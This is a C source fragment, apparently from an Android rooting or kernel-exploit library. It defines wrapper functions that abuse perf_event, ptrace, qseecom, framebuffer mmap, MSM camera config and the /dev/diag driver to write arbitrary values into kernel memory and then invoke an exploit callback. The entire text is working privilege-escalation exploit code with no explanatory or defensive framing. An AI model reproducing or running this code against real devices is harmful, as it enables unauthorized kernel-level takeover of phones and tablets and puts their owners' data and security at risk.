static bool perf_event_run_exploit_with(unsigned long int address, int value, bool(*exploit_callback)(void* user_data), void *user_data, increment_function increment_function) { int number_of_children; bool success; number_of_children = perf_event_write_value_at(address, value, increment_function); if (number_of_children < 0) { return false; } if (number_of_children == 0) { while (true) { sleep(1); } } success = exploit_callback(user_data); perf_event_reap_child_process(number_of_children); return success; }
bool ptrace_run_exploit(unsigned long int address, void *value, bool (*exploit_callback)(void *user_data), void *user_data) { bool success; ptrace_write_value_at_address(address, value); success = exploit_callback(user_data); return success; }
bool qseecom_run_exploit(unsigned long int address, int value, bool(*exploit_callback)(void* user_data), void *user_data) { if (!qseecom_write_value_at_address(address, value)) { return false; } return exploit_callback(user_data); }
bool fb_mem_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data), void *user_data) { void *mapped_address = NULL; int fd; bool success; mapped_address = fb_mem_mmap(&fd); if (mapped_address == MAP_FAILED) { return false; } success = exploit_callback(mapped_address, user_data); fb_mem_munmap(mapped_address, fd); return success; }
bool msm_cameraconfig_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data), void *user_data) { void *mapped_address = NULL; int fd_video; int fd_config; bool success; mapped_address = msm_cameraconfig_mmap(&fd_video, &fd_config); if (mapped_address == MAP_FAILED) { return false; } success = exploit_callback(mapped_address, user_data); msm_cameraconfig_munmap(mapped_address, fd_video, fd_config); return success; }
bool diag_run_exploit(struct diag_values *data, int data_length, bool(*exploit_callback)(void* user_data), void *user_data) { bool success; int fd; fd = open("/dev/diag", O_RDWR); if (fd < 0) { printf("failed to open /dev/diag due to %s.\n", strerror(errno)); return false; } success = diag_inject_with_fd(data, data_length, fd); if (success) { success = exploit_callback(user_data); restore_values(data, data_length, fd); } close(fd); return success; }